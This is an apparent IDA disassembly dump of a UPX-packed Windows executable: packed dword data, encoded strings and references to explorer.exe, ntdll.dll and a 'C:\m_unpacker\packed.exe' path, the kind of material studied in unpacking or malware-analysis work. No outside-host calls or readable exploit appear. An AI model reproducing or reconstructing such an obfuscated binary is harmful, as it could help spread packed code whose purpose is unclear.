fidivr dword ptr [ebp+52h]
rcr cl, 1
jl short loc_4040F9
rcr cl, 1
jns short loc_404126
js short loc_40409E
push ebx
push ebp
rcl byte ptr [eax+7Ah], 1
jl short $+2
loc_4040B4: ; DATA XREF: sub_4020E2+635�o
pop eax
fcom st(3)
rcl bh, 1
fiadd dword ptr [eax]
loc_4040BB: ; DATA XREF: sub_4020E2+5BE�o
add bl, bl
push ebx
push eax
ficomp word ptr [edx+59h]
push ebx
pop eax
cmc
fcmovbe st, st(6)
fiadd dword ptr [eax]
; ---------------------------------------------------------------------------
db 3 dup(0)
dword_4040CC dd 55D751D9h, 0D350D4D6h, 0D6DAF5D0h, 0DAh ; DATA XREF: sub_4020E2+556�o
dword_4040DC dd 0D8D55E51h, 0D655D954h, 0D6DAF5D5h, 0DAh ; DATA XREF: sub_4020E2+4EE�o
dword_4040EC dd 0D05ED9DEh, 0F554DA59h, 0DAD6DAh ; DATA XREF: sub_4020E2+486�o
byte_4040F8 db 0DFh ; DATA XREF: sub_4020E2+41F�o
; ---------------------------------------------------------------------------
loc_4040F9: ; CODE XREF: UPX0:004040A5�j
rcl cl, 1
pop esi
push edx
fdivrp st(5), st
fcmovbe st, st(6)
fiadd dword ptr [eax]
loc_404103: ; DATA XREF: sub_4020E2+378�o
add cl, dl
push eax
fcom dword ptr [esi-2Dh]
setalc
aad 0
loc_40410C: ; DATA XREF: sub_4020E2+351�o
; sub_4020E2+3F8�o ...
push ebx
inc dword ptr [eax]
loc_40410F: ; DATA XREF: sub_4020E2+2FC�o
add [ecx+56h], bl
push edi
pop edx
pop ecx
ficom dword ptr [esi+52h]
rcr byte ptr [ecx-0Bh], 1
fcmovbe st, st(6)
fidivr dword ptr [ebp+52h]
rcr cl, 1
jl short loc_404176
rcr cl, 1
loc_404126: ; CODE XREF: UPX0:004040A9�j
jns short loc_4041A3
js short $+2
; ---------------------------------------------------------------------------
dw 0
dword_40412C dd 0CCFF53h ; DATA XREF: sub_4020E2+2CA�o
; sub_4020E2+6A7�o
dword_404130 dd 0DAD8D8D6h, 0DE7575FFh, 5E5E5B51h, 0D6D0D15Ah, 50D5F554h
; DATA XREF: sub_4020E2+27E�o
dd 0DBDA75D8h, 755B5155h, 0D9DA51D3h, 0D852D0DEh, 75h
dword_404158 dd 0DAD8D8D6h, 0D97575FFh, 56D9D851h, 5854D35Ah, 50D5F559h
; DATA XREF: sub_4020E2+266�o
dd 0DBDA75D8h, 755B5155h
db 0D3h, 51h
; ---------------------------------------------------------------------------
loc_404176: ; CODE XREF: UPX0:00404122�j
fcmovu st, st(1)
fcomp5 st
push edx
fdiv dword ptr [ebp+0]
; ---------------------------------------------------------------------------
dw 0
byte_404180 db 0CCh ; DATA XREF: sub_4020E2+23D�o
db 58h, 53h, 56h
dd 0DE5756DEh, 0DE50F5DBh, 50h
byte_404190 db 0CCh ; DATA XREF: sub_4020E2+226�o
db 0D9h, 55h, 0D9h
dd 50DA5953h, 50DE50F5h, 0
byte_4041A0 db 0CCh ; DATA XREF: sub_4020E2+20F�o
; ---------------------------------------------------------------------------
pop eax
pop eax
loc_4041A3: ; CODE XREF: UPX0:loc_404126�j
pop eax
xlat
cmc
push eax
ficom word ptr [eax+0]
; ---------------------------------------------------------------------------
dw 0
byte_4041AC db 0CCh ; DATA XREF: sub_4020E2+1F8�o
db 50h, 51h, 56h
dd 5AD458D1h, 50DE50F5h, 0
byte_4041BC db 0CCh ; DATA XREF: sub_4020E2+1E1�o
db 53h, 58h, 0D1h
dd 50F5DB51h, 50DEh
byte_4041C8 db 0CCh ; DATA XREF: sub_4020E2+1CA�o
db 5Eh, 57h, 55h
dd 0F5D455DAh, 50DE50h
byte_4041D4 db 0CCh ; DATA XREF: sub_4020E2+1AD�o
db 0D5h, 59h, 0D5h
dd 0DBD8D0DAh, 0DE50F5DBh, 50h
dword_4041E4 dd 0D070h ; DATA XREF: sub_4020E2+15D�o
dword_4041E8 dd 0CCFF43h ; DATA XREF: sub_4020E2+123�o
dword_4041EC dd 0D5DB5057h, 0FB7BD450h, 0D4D4D0F5h, 0 ; DATA XREF: sub_4020E2+74�o
dword_4041FC dd 0DB505B58h, 0D0F5FB7Bh, 0D4D4h ; DATA XREF: sub_4020E2+55�o
aKpPXqVVPqp db 'KPÀPÓXQÊÛVÙVÔPQP',0 ; DATA XREF: UPX0:004034C0�o
align 4
dword_40421C dd 0D4D0D8D5h, 0D4D0F5D4h, 0D4h ; DATA XREF: sub_402A7F+1EE�o
aDrVpyeKpsVu db 'ÅØDRÚÉVPYEÑKPSØVUÕ',0 ; DATA XREF: sub_402A7F+1AE�o
align 4
byte_40423C db 0CCh ; DATA XREF: sub_40301C+100�o
db 5Bh, 0D9h, 53h
dd 0D85B55D6h, 50DE50F5h, 0
dword_40424C dd 0D4DADE50h, 0DB50DB55h, 50DE50F5h, 0 ; DATA XREF: UPX0:0040338D�o
; UPX0:004035AF�o
dword_40425C dd 6C707865h, 7265726Fh, 6578652Eh, 366h dup(0) ; DATA XREF: UPX0:004032E0�o
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402A18+1E�o
; UPX0:00403444�o
align 4
dd 3Ah dup(0)
dword_405104 dd 99h ; DATA XREF: sub_401117:loc_4011BA�r
; sub_401117+B2�w ...
dword_405108 dd 40h dup(0) ; DATA XREF: sub_401A08+12F�o
; sub_4020E2+274�o
dword_405208 dd 6C64746Eh, 6C642E6Ch, 6Ch, 3Dh dup(0) ; DATA XREF: sub_401117+30�o
; sub_401117+55�o ...
dword_405308 dd 40h dup(0) ; DATA XREF: sub_401A08:loc_401B3E�o
; sub_401A08:loc_401B72�o ...
byte_405408 db 1 ; DATA XREF: sub_4013F5+12�r
; sub_4013F5+CE�w
byte_405409 db 1 ; DATA XREF: sub_4013F5+9�r
; sub_4013F5+3D�w
align 4
dword_40540C dd 0 ; DATA XREF: sub_40301C+18C�o
; sub_40301C+1AC�r
dword_405410 dd 0 ; DATA XREF: sub_40301C+1A6�r
; sub_40301C+1C3�r
dd 6FBh dup(0)
UPX0 ends
; Section 2. (virtual address 00007000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00007000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 407000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_407000 dd 58h, 3000h, 74736C01h, 79706372h, 6C010041h, 63727473h
; DATA XREF: UPX1:004086B1�o
dd 4169706Dh, 736C0100h, 656C7274h, 100416Eh, 7274736Ch
dd 41746163h, 650000h, 30140000h, 77010000h, 69727073h
dd 4166746Eh, 0
dd 4CF00000h, 61F0601h, 2 dup(6090609h), 302D0F0Dh, 112A171Ah
dd 15111415h, 2D171514h, 1E111A11h, 814182Ah, 9110B07h
dd 0C0B0F09h, 18111D1Bh, 6F100B09h, 1C0C060Ah, 400C0609h
dd 0F0B0F0Bh, 1A374811h, 470C0609h, 9291043h, 300A0C06h
dd 1610100Eh, 0D0E0E27h, 173D0528h, 16081432h, 9241005h
dd 347E0C06h, 0C271606h, 0E11112Bh, 10070714h, 0D051305h
dd 22101005h, 0C240D12h, 9440C06h, 95A0C06h, 12410C06h
dd 0E28110Fh, 101B162Ch, 6092C84h, 180BA30Ch, 1B0C060Ch
dd 3141110Eh, 2D0C2825h, 1A053F06h, 0F0F0A17h, 0E10110Fh
dd 291A0D0Bh, 5130809h, 0C0D0B14h, 1717120Bh, 15171717h
dd 0A0E080Ch, 18053E0Eh, 8103D15h, 6093E27h, 80C0F10h
dd 41274027h, 41274127h, 8093F27h, 10103E27h, 0C25080Ch
dd 6092C08h, 0E160C0Ch, 18362B0Ch, 310C0609h, 19392729h
dd 93B0E24h, 0B197014h, 82D570Eh, 28104A0Dh, 0A0C0608h
dd 13060709h, 0C060906h, 110C550Ch, 6091C18h, 114D370Ch
dd 1B0E0F3Ch, 120F1333h, 0C171020h, 42361106h, 0C060D19h
dd 10310C0Ah, 608145Bh, 837220Ch, 60B0C06h, 11110616h
dd 1B160E2Ah, 15120506h, 0D0B0F0Ch, 0D085938h, 85091412h
dd 0D4C150Bh, 2A090E08h, 66054834h, 0C060918h, 100F0C1Eh
dd 0E4B1308h, 17090E07h, 100E0Ch, 4550h, 4014Ch, 470BAD0Dh
dd 2 dup(0)
dd 10200E0h, 8010Bh, 2800h, 0E00h, 0
dd 326Bh, 1000h, 4000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 4000002h, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 426Ch, 3Ch, 6 dup(0)
dd 6000h, 328h, 0Ch dup(0)
dd 4000h, 1Ch, 6 dup(0)
dd 7865742Eh, 74h, 26CBh, 1000h, 2800h, 400h, 3 dup(0)
dd 60000020h, 6164722Eh, 6174h, 31Ah, 4000h, 400h, 2C00h
dd 3 dup(0)
dd 40000040h, 7461642Eh, 61h, 41Ch, 5000h, 5 dup(0)
dd 0C0000040h, 6C65722Eh, 636Fh, 38Eh, 6000h, 400h, 3000h
dd 3 dup(0)
dd 42000040h, 6000h, 42C4h, 604Ah, 61D400h, 0FDA0000h
dd 0FA81C094h, 9FA21BC2h, 0BBF64D3Dh, 51BBC920h, 3DC1C0C8h
dd 0B149EB42h, 531C69AEh, 0FE2CB456h, 0A78DC28Fh, 348A5700h
dd 0A4299DBFh, 0EF565799h, 79C15A96h, 77565F5Bh, 74DB85D8h
dd 0FD87F37Fh, 4385682Dh, 8D19FDC9h, 5351FC4Dh, 4268FC7Dh
dd 609E6FA8h, 1661DC1Bh, 54E1357h, 8EC142C3h, 6A7BB0h
dd 0CA353943h, 0CC787CD8h, 0AA49C3F7h, 0C70A28E3h, 0D8190B05h
dd 4CC27758h, 834DFF6Ah, 0E4360E27h, 0ED5C80CFh, 3EB0D515h
dd 636C8C72h, 3EB3437h, 0EC1408B3h, 266C23DAh, 18B8085Bh
dd 26163113h, 0C24C9C9Ch, 0B705DA20h, 0C9C227BCh, 19048764h
dd 7CBA16F1h, 0D61C6612h, 93E8B0A5h, 42E67743h, 0B50C920Ch
dd 0DB63FCE8h, 79FC6B7Ah, 0DA58466Ah, 9CAB3159h, 1C2C6B75h
dd 21844140h, 7AF8029Fh, 0A17FD884h, 68577F77h, 8AC4909Bh
dd 5D47056Ah, 9DB2308Ah, 104451F4h, 56FDFAECh, 9F6FD0B9h
dd 0FC240359h, 0F445F700h, 0D5B740E1h, 483AFF59h, 8604BB10h
dd 0BBD6ED9Ch, 2ABDBC8Dh, 29F68549h, 2172461Dh, 0B90B3823h
dd 1D92380Bh, 4E0BB7EEh, 0A56CD210h, 0B20004DFh, 0B5A0894Bh
dd 8B1C33Dh, 0B0B4CBCh, 0E206B33Dh, 9F6E0C9h, 0FEE8850Bh
dd 0F8505677h, 5A0EBBDAh, 5B021A0Ah, 189F16C9h, 1B6ED6D7h
dd 6A81D2C9h, 0CCF04D2Ch, 0B860F220h, 2464CFB3h, 0CC3DE794h
dd 2B7F784h, 9168F03Ch, 3CE4FB21h, 6B167250h, 3F56FE26h
dd 303D03DDh, 16DD1720h, 0FBB93556h, 30A0B93Eh, 0D6FF5008h
dd 8048F073h, 0D2ECE9BDh, 0F3ABD8Ch, 0EA0CE385h, 8D01D65Ch
dd 985B0D93h, 8B739AAAh, 0E4FF8B3Dh, 0ABF0B079h, 9A53DB5h
dd 804E01EBh, 0BDB635BCh, 5C237F1Dh, 0FFECF575h, 7E6A7315h
dd 0CD24CBEDh, 0DF551C2h, 0EF19198Bh, 6F2CAE09h, 35843B27h
dd 0BE667E8Ah, 43450B1h, 44DB7C9Fh, 0B3438D0Fh, 0CE669BDh
dd 0CC095365h, 0B150106Ah, 49307E0Eh, 0F89B1288h, 224FBE70h
dd 530BC4F6h, 6D556C07h, 0C2EF707h, 55948D89h, 0E8786E07h
dd 43DCE951h, 85FE4C3Ah, 0FCDB44E7h, 9EC26EB2h, 1BCB84E2h
dd 0EED19B53h, 0EBB4B81Eh, 0CF045137h, 32F27059h, 0E51CB349h
dd 3D1818B4h, 17C879Eh, 0FD5C1723h, 0C63E6B00h, 68A6691Ah
dd 1D532A2Bh, 38C1E4Bh, 3DD80B0Ch, 0F9017BB5h, 0E9ED0A02h
dd 0C92F20E4h, 2D672172h, 46A80A1Dh, 180321B2h, 0E12E3E42h
dd 428B34A0h, 3902C8EAh, 0D06C30B5h, 5BDB005h, 0DF4F83B6h
dd 0FC181F62h, 4985848Bh, 0DF12EFEBh, 7C1C30BAh, 3DF00B08h
dd 3359E4EFh, 0C4BFE5DBh, 0D896706h, 0C7E85D89h, 7D0E445h
dd 85907C2Fh, 383015Fh, 8BCF03C7h, 1CED7C67h, 9616A6A4h
dd 841B5641h, 7FC4B0F7h, 816853B2h, 6A0534D4h, 0E3ECBC03h
dd 949733C0h, 0ED4B22ECh, 45970877h, 562178D0h, 94BED142h
dd 5E952184h, 6558F36Ah, 77B41A27h, 34046C0h, 92F072F7h
dd 6FC5E045h, 9E468D73h, 6519813Dh, 0B02D9A5Dh, 46FBF89Fh
dd 685F730Bh, 0EE925DDBh, 58FB8A90h, 0C30CFE83h, 989B20ECh
dd 2A7C197Dh, 6CCDFE78h, 5ED9F42Bh, 145D3810h, 210628D8h
dd 61019ADh, 39235BD5h, 0BA8DBB6Ah, 7755967h, 5B641B7h
dd 10084306h, 0EF08239Eh, 97E11DE7h, 0EBBDBCCCh, 3DBDAD71h
dd 0E433A48Ah, 29B098C1h, 3DB10B00h, 91E366A9h, 186A4E05h
dd 0E4B61284h, 13D89265h, 0E2C43D13h, 895C0592h, 0FC90D9Ch
dd 6323ADC1h, 0E4D71DAFh, 98C95708h, 2686E0h, 0BB05C91h
dd 80B8163h, 41B55FF0h, 19FC90CEh, 7DBD6623h, 0CB12FBB8h
dd 44C6B5BFh, 0D09C78BEh, 0F457561Ah, 5ADB1622h, 1BE4F518h
dd 33611C02h, 0F761720h, 0B21A9E5Eh, 3C3584C8h, 41140639h
dd 5191FC7h, 5CE02768h, 899D572Fh, 0AC313A7Bh, 0FCA88E0Fh
dd 86044F68h, 7420AD90h, 2F3AB6F4h, 27067FB8h, 888DE845h
dd 0DE5DC5FFh, 0BC92048Fh, 0E12F4369h, 0F1144801h, 2B6E08F8h
dd 80CA96E1h, 68CBF128h, 98678507h, 0C5740A5h, 0E2DC457Fh
dd 858491B4h, 0E07274A2h, 93900D44h, 6937C301h, 0C95C1A9Ch
dd 5A24610h, 33F90DA7h, 621E7C20h, 81A2129h, 0ECECC21Dh
dd 35F4814Ah, 6BB1B6C6h, 1DC095C0h, 51D0CFEDh, 35341E9h
dd 7A860339h, 6CC307B4h, 0E4C33A1Dh, 3DDA7CBFh, 9015DF6Bh
dd 0C36819A3h, 0FF0F3FD1h, 2EEB26DEh, 0D85DE061h, 0DC6EE064h
dd 9A366926h, 30943AC6h, 0C8462ED4h, 3D2E5E46h, 0C2E3569Dh
dd 0CB5C19D2h, 1D12E83Eh, 8B319133h, 24244CBCh, 36E1803Dh
dd 1E616DB0h, 0DCE256E6h, 2FC5C84Eh, 183987CBh, 3020232h
dd 149A42E4h, 5BF6FBBEh, 770DEBB9h, 3FE3DFEh, 5D880383h
dd 912BE10h, 0EB77FC2Fh, 28741404h, 0C9626056h, 777DC3FEh
dd 0FB0CBED4h, 1C2C7314h, 0CB1E300Ch, 1641A10Dh, 120A3679h
dd 0BD800142h, 712C187Eh, 17D6E20h, 0AEF7CBF1h, 0CBB0E198h
dd 11225633h, 0C94CE387h, 16DE5C80h, 0ABB18056h, 3BAF9E61h
dd 34BF8BF3h, 17ADC9C8h, 4D3B2D8Bh, 510F74E0h, 1552A978h
dd 38097DF4h, 0D0B06E08h, 0FABA2C2Eh, 235EA9EBh, 0B616B83Dh
dd 7C2BE03Ah, 282C285Ch, 0D8454A13h, 92A2843Bh, 48EF837h
dd 3774067h, 843BD910h, 9F497ADEh, 4AC181ADh, 0ADFE7A77h
dd 346E993Dh, 406A40FEh, 1388458Dh, 1A4484ECh, 16E186D8h
dd 23805C1Ah, 0F64A597Dh, 318AC749h, 0C8D6CC46h, 0A0D62181h
dd 38003784h, 0C1357843h, 3A7B0440h, 776F05AAh, 57501C2h
dd 8EB408Dh, 0A4D5B8CAh, 0C883155Eh, 245105FFh, 26092E88h
dd 2B4DB37h, 0BC1234AAh, 0ECBF7981h, 0AE534357h, 581E3A49h
dd 0ADA4E86Dh, 9791DF8Bh, 0B13D1515h, 313E0A6Ah, 6C6C80FCh
dd 3B572EC2h, 19EC1E0Ch, 0AD23A926h, 82C33B6Bh, 43FA92F7h
dd 0C60E234Eh, 86017045h, 64E43964h, 0B9D41D99h, 76D6ECDh
dd 3930FF33h, 0F7D54FCh, 0DECDF61Eh, 0F983A920h, 564C1D70h
dd 0E1B73D18h, 0BCA690FDh, 8138117Dh, 0E858937Ah, 0ABDDEC52h
dd 0C0B70F03h, 744598AEh, 4FD93705h, 0ECDE974Ch, 57B567h
dd 32610C7Bh, 55154DAh, 0B071208Bh, 662B1B10h, 9636E439h
dd 33D9DB54h, 5634D8B8h, 91A114ADh, 2D1841BFh, 0B56C96EBh
dd 0FE0397A3h, 6428D632h, 0D44F41DEh, 389C58EDh, 151A3D8Bh
dd 0CE55C445h, 0D7856322h, 16C81CB8h, 1901BED4h, 0E4BC0A79h
dd 67910C2Dh, 0F4AC4640h, 192EC009h, 9004A090h, 91901916h
dd 800D1467h, 7203B124h, 6AC27A86h, 8B992825h, 1E589245h
dd 0DFA51740h, 4330C81Ch, 747D8166h, 0B82E0419h, 3F6A4E8Fh
dd 70A49001h, 4749320Ch, 0F51A4F0Fh, 63251BB7h, 7C1BCB34h
dd 5E2C7403h, 31A13CFCh, 8BD7FEC4h, 0EC6C241Dh, 50811AC3h
dd 196AD312h, 0C12C1031h, 0FD0E452Eh, 26006A59h, 60BB2DF2h
dd 40A2313h, 8109910h, 85E0CBE7h, 3DC919AAh, 8765F3ADh
dd 810C5D95h, 13207B8Fh, 407C8C8h, 6B816801h, 7E7D010Ch
dd 0C081287Ah, 70E1A6h, 28CE65D6h, 8E0F8F7Fh, 1D330237h
dd 0DB3BA400h, 1EE9167Bh, 917DA6CEh, 0C464067Ch, 6F8300Ah
dd 661B20E4h, 0D2D90B04h, 35EC464Ah, 1C802570h, 676DB591h
dd 0C8413214h, 0E4DC0DC8h, 532104C8h, 9148F4CCh, 0BC0C0C8Ch
dd 0CE3003B0h, 24156B46h, 19229476h, 51B40619h, 3983E4BAh
dd 0C63DE4h, 0E40D5983h, 8ABDD30Ch, 0E4BE9AEh, 98DC20B0h
dd 20763234h
dd 1FD83867h, 203594AAh, 0E26857F1h, 42270118h, 0C4613244h
dd 9607E424h, 1AED88ECh, 52BF2416h, 3B535790h, 1E378164h
dd 0D8504C45h, 0FB0A8A68h, 77528199h, 88104AD5h, 2D8A6145h
dd 190DBFFFh, 75C08469h, 6345C606h, 405EB30h, 0A4BE6313h
dd 4449CC99h, 46C6C4Eh, 6E673C17h, 76020DBh, 62354A6Dh
dd 0C21B7519h, 602762B6h, 64155Bh, 87929B39h, 0D388304Bh
dd 198211CFh, 21E40B90h, 0BD846E08h, 91DE9901h, 0DB02CD24h
dd 5987606Ah, 4B8F0C89h, 16CB2CB6h, 0EDA37216h, 0B241B69Fh
dd 74305A7Dh, 0E75AE903h, 0F22DB65Bh, 5A582F4Dh, 0AF3A5D40h
dd 0D1692658h, 2EAC3131h, 0CC009859h, 1E5C5805h, 479192Bh
dd 36C62280h, 7A0CC918h, 786AA99Eh, 18CB8123h, 0AFEE00B4h
dd 68F84968h, 95902B19h, 41381F1Bh, 83E8509Eh, 5A3578C5h
dd 14377D6Dh, 0BFDE6FECh, 81F0F0DFh, 40432B57h, 74DFEB00h
dd 6832FD49h, 1297812Ch, 7400D057h, 72F56826h, 0C564E29Ah
dd 0E81E3D99h, 42576203h, 998CB53Fh, 5FC57443h, 0D05F72A8h
dd 20C25EE8h, 0E221076h, 415BE8Bh, 3D58F97Eh, 111D87BDh
dd 0C4D870E8h, 0D9117E1Dh, 7D46A99Ah, 0F40A0F40h, 5121E829h
dd 859CB129h, 0E012E6C9h, 0DCAB4F92h, 0FC2DBE1Ch, 0F63C50D0h
dd 72D00334h, 89226306h, 0FF0DC55h, 0C9C80B64h, 83ED7C78h
dd 0D0B218C2h, 1AF05BB7h, 58E41E43h, 0B5F8CB8Bh, 4CBC9C23h
dd 913D0F0Fh, 758B9B14h, 72D5B2D4h, 0E807C838h, 0BC8859A2h
dd 0E42BB24Ch, 0B03D1C1Ch, 6622C99Fh, 0F0ED2C0Bh, 10EA8906h
dd 685708FEh, 0A08B638Ch, 2D097653h, 0AC6FFF6Ah, 1BDFF7F8h
dd 25B768FFh, 0E783EF0Ah, 0DF2F5FB0h, 331C60EAh, 5751FDC9h
dd 33D06A51h, 0EA7C20F6h, 0F6C63BDBh, 320775ECh, 0EA132071h
dd 0A9C465ADh, 6B0B42A7h, 0CDD87682h, 565905h, 6F3BEC7Ch
dd 395F16C3h, 69CF70F4h, 32271D39h, 33485C20h, 0A91B34C3h
dd 37810649h, 19341247h, 32274203h, 0E5BC0D28h, 8902EB01h
dd 4C57BEADh, 1F9EA9B2h, 1C321F09h, 0FE927553h, 0EAEE6897h
dd 8B531FC0h, 51BCA6F0h, 3C37A2C6h, 5AB13F4Ah, 0E9ABFA81h
dd 67C6C242h, 33B1C269h, 0F70D08D2h, 616A12E4h, 0A053F0B6h
dd 6410B01Bh, 0B789A914h, 68B01C71h, 0C465F9ABh, 4652574Bh
dd 0D306F6A0h, 5251E0h, 0C85C0CAAh, 542A1159h, 29B0B010h
dd 0E82990B6h, 0D2F4755Bh, 0DB1D352Ch, 0E4D112EAh, 0BC97D6C3h
dd 3D1E1E4Ch, 0DC458B8Eh, 0AB56CD1Dh, 31450F1h, 225B5E60h
dd 0CB2CBF92h, 7B1F1F24h, 6AF07D8Bh, 0D2D5D25Bh, 2BDF801Bh
dd 7F54BF5Dh, 0B641C6D0h, 8B667E12h, 0D0BD04Ah, 0F84DEDA9h
dd 0B8D74D0Fh, 0D2FFEE39h, 75BE8DFFh, 6798109h, 5F09078Bh
dd 0EDEB4103h, 302498Bh, 0FD260C4Ah, 381A037Fh, 0EB08C1EDh
dd 39664101h, 41FA7531h, 92AD941h, 0E5EF05D5h, 6C87C887h
dd 0C1203907h, 8B225804h, 0D52FF0B5h, 8D730C52h, 8DFC3274h
dd 0D589E950h, 203FFFFDh, 41118ACBh, 2C74D284h, 73F0FA80h
dd 0C2B60F07h, 0FEBF003h, 0BFFDBB1Dh, 0E28301E1h, 10E2C10Fh
dd 0F203D00Bh, 231E0168h, 0CA8BDC75h, 0A1D7D55Dh, 0F87D2B28h
dd 4C9CEA86h, 7DF78B76h, 0AC9F17CEh, 39D6FFB6h, 7A75107Dh
dd 0B3B27922h, 44E61874h, 3F592AEBh, 5202568Fh, 8022CC13h
dd 2DCC853h, 6092101h, 80B18009h, 11E42B8Ch, 0A0CBCD4Fh
dd 0BA8D4B3Fh, 0BD1F7900h, 168941E2h, 0F085C7E8h, 3F8A0227h
dd 3D24CB2h, 682626A6h, 0AA1DE02Fh, 682C0EF1h, 328DA863h
dd 0D1D6FCA2h, 1AB71046h, 0B589D543h, 676CFDA0h, 9FB29642h
dd 18C841ADh, 0A1906CE7h, 0CC09890Fh, 20C75C80h, 3FF5008h
dd 0F48019h, 67681374h, 0C216CD95h, 9EA5920Bh, 83CE218h
dd 0AD40EC31h, 981F873Dh, 39C94904h, 93014C9Ch, 5535B740h
dd 0BAC839CEh, 6CD22514h, 3D252F27h, 201C389Eh, 0BC8E05CAh
dd 3D23234Ch, 55575388h, 63B2C1Dh, 0E9534310h, 1D24D015h
dd 8A079D60h, 6C5269E7h, 0F0342B7Ch, 156FB89Ah, 1ABBE753h
dd 2984886h, 0AF181A4Ch, 91CCD65h, 0E84C3AD6h, 4AFA8419h
dd 5349A137h, 40B4044Fh, 449DB257h, 0F1D63D72h, 25858092h
dd 983C32A9h, 6F202F40h, 0B2D8D42h, 8D5C847Eh, 973DBE46h
dd 270584DCh, 0ED0110C0h, 0E5901FDBh, 3BB857BCh, 0E45D89F3h
dd 10E81466h, 58A4068h, 550BD8EDh, 4B10EC9h, 0CC2D4CC5h
dd 0F80CE4B6h, 1B0309B8h, 0D0C175DBh, 443EFFFEh, 250C0510h
dd 0B766ADD8h, 1A65E210h, 1606847Bh, 210F1C8Bh, 3B68FC19h
dd 147B88BFh, 920BF8F5h, 5EAAC391h, 0C821D90Ch, 0B69B019Fh
dd 0A2602595h, 0FAD9768Ah, 0EA5771D2h, 5F59294Bh, 12D6FA5Bh
dd 14265E4Bh, 0EBA33D14h, 0C871F2EDh, 2E4E3CC9h, 443059D2h
dd 8D9265E4h, 853D2929h, 0F6A17C5Fh, 7F1F5DACh, 9D8D1C6Ah
dd 7CB25AB5h, 0DCAD12C8h, 7FCA03C2h, 89642E4Eh, 15E9115Ch
dd 30768366h, 0FCF10363h, 2DF883EDh, 5CC30F36h, 5975D805h
dd 370860Fh, 30E43AAEh, 0CEBF2FDCh, 165C78ADh, 702EBE9Fh
dd 7AAF128Bh, 0AF81D07Ah, 0BEED46FEh, 0D948D14h, 7A8011C5h
dd 0DA8B02FAh, 0F8C83B41h, 3E97DDB7h, 20B80B8Bh, 0A1C80B00h
dd 6C707865h, 46E6850Fh, 6FBF7F96h, 6F10044Bh, 0D5726572h
dd 2D07ED08h, 78652E7Fh, 0C6EC465h, 0A5180948h, 625A55C0h
dd 5BBF896Bh, 7D722121h, 0F34CACC8h, 5EC461ABh, 9C80190h
dd 0D5616DC5h, 0F685E66Fh, 0CB797459h, 5D6859A7h, 0FFF68F5h
dd 2033CA1Fh, 6A1A2D5Ch, 10DCA499h, 90EBAC10h, 39D08E05h
dd 5C3B742Ch, 1A3B216Dh, 2034AFC0h, 0F021181Ch, 7D0C1C84h
dd 0E02DB04Bh, 8C26EDA7h, 1557C657h, 0E8F4B4D8h, 53E70D68h
dd 42AD0578h, 5A9586EFh, 0BE070E17h, 0A37580DBh, 0D5890185h
dd 120520Ch, 16216BE5h, 5D0AA2F5h, 49979358h, 30D3479Ah
dd 20873D30h, 57A9801Bh, 0AAB24E2Ch, 7A6B0E91h, 1608A310h
dd 9CBFC93h, 1B3D12B9h, 46F8066Ah, 0B9534234h, 7A9FD197h
dd 0DDA1AF8h, 6ADD4132h, 36280748h, 0B546EE58h, 2F4DD54h
dd 0E0ADE1Ah, 2F2F4CB5h, 5F6ACB8Dh, 557D035Ah, 7A2167DCh
dd 0B968C054h, 68F945E8h, 2E848DEh, 50D4B409h, 5E0C2643h
dd 1C579645h, 0A492D30Eh, 80071127h, 234427Ch, 0A23DD97Bh
dd 8D188C8Bh, 921F2111h, 3BCB2431h, 1E5378F3h, 36D52C92h
dd 67222D70h, 596BA3DCh, 0F9C01D36h, 1E0D94ECh, 7524C61h
dd 535B6DF9h, 0CE78031Eh, 0FD2D316h, 3635833h, 0DE109630h
dd 0AB0BD21Eh, 3DC53C80h, 0EC3F80A7h, 0C2B80167h, 0CC000Ch
dd 244C8D51h, 16FFD6D2h, 0C01BC835h, 0C823D0F7h, 0F081C48Bh
dd 0FF881684h, 0A727BA5h, 9459C18Bh, 0AA89008Bh, 6CA3F62Dh
dd 858D5DD5h, 0CB97h, 546C0802h, 0FE5FEF05h, 50D65B0Fh
dd 0FB7BD4D4h, 5800D0F5h, 5554D4DBh, 0D8FD0AD5h, 562A536Dh
dd 0D85001D5h, 525BDA0Ch, 82EF56DAh, 169FB9h, 0CD9D052h
dd 50D90030h, 5DFB5BDBh, 3456B044h, 53D95BAEh, 375B55D6h
dd 7BF77BFFh, 1B50DE50h, 0F1137AFBh, 2B7CD056h, 0D05553F1h
dd 97FFFB50h, 700A6EEAh, 0B4502758h, 5BD057D1h, 0D6DAF554h
dd 8CBF7DDAh, 7C5575DDh, 787B7903h, 0D8587A23h, 36D7D0D3h
dd 0DAB55ADAh, 5A497127h, 0B5835834h, 6F26F63Fh, 0D655D751h
dd 101C50D4h, 6C1FD851h, 0D8D55EFBh, 0D512D954h, 5ED9DE0Fh
dd 55DA59D0h, 0FF676EDAh
dd 0D1D0DF00h, 18DE525Eh, 0D356CBD1h, 0B5B60025h, 0DB7E35F6h
dd 70C45257h, 0FFFF7C59h, 1F3F42E6h, 0D8D600CCh, 75FFDAD8h
dd 5B51DE75h, 0FF5A5E5Eh, 0D1ED0DEDh, 94DD6D0h, 55DBDA75h
dd 51D37510h, 0D0DED9DAh, 983FF952h, 272B0E6Bh, 0D9D851D9h
dd 54D35A56h, 2DB85958h, 58CC0875h, 0DE73DE61h, 0B42B6CDBh
dd 0AF0F1577h, 0E508025h, 0DEDB0C3Fh, 1BD7001Fh, 5AD45817h
dd 64B760FFh, 51D1FA1Bh, 575ECC38h, 0D455DA55h, 7B7F90F6h
dd 59D5530Ch, 0D8D0DAD5h, 0BBD070DBh, 0CD0AD84Bh, 84735743h
dd 0E17E9FD4h, 5B58DAC3h, 504B0D10h, 515838C0h, 7056DBCAh
dd 0AFDB5885h, 3D5F67D4h, 0E5FDB81Ah, 0D8C5DB41h, 5056C944h
dd 2AD14559h, 0DCDD853h, 73D66704h, 300600D0h, 0DAF6B0C1h
dd 53DB55D4h, 0CA40140Fh, 0FA072601h, 20D08157h, 642A0B80h
dd 0C8820451h, 9000286h, 8B9E5FF9h, 6C013058h, 63727473h
dd 1F417970h, 6D07D9F2h, 14416970h, 616E656Ch, 0FFB94174h
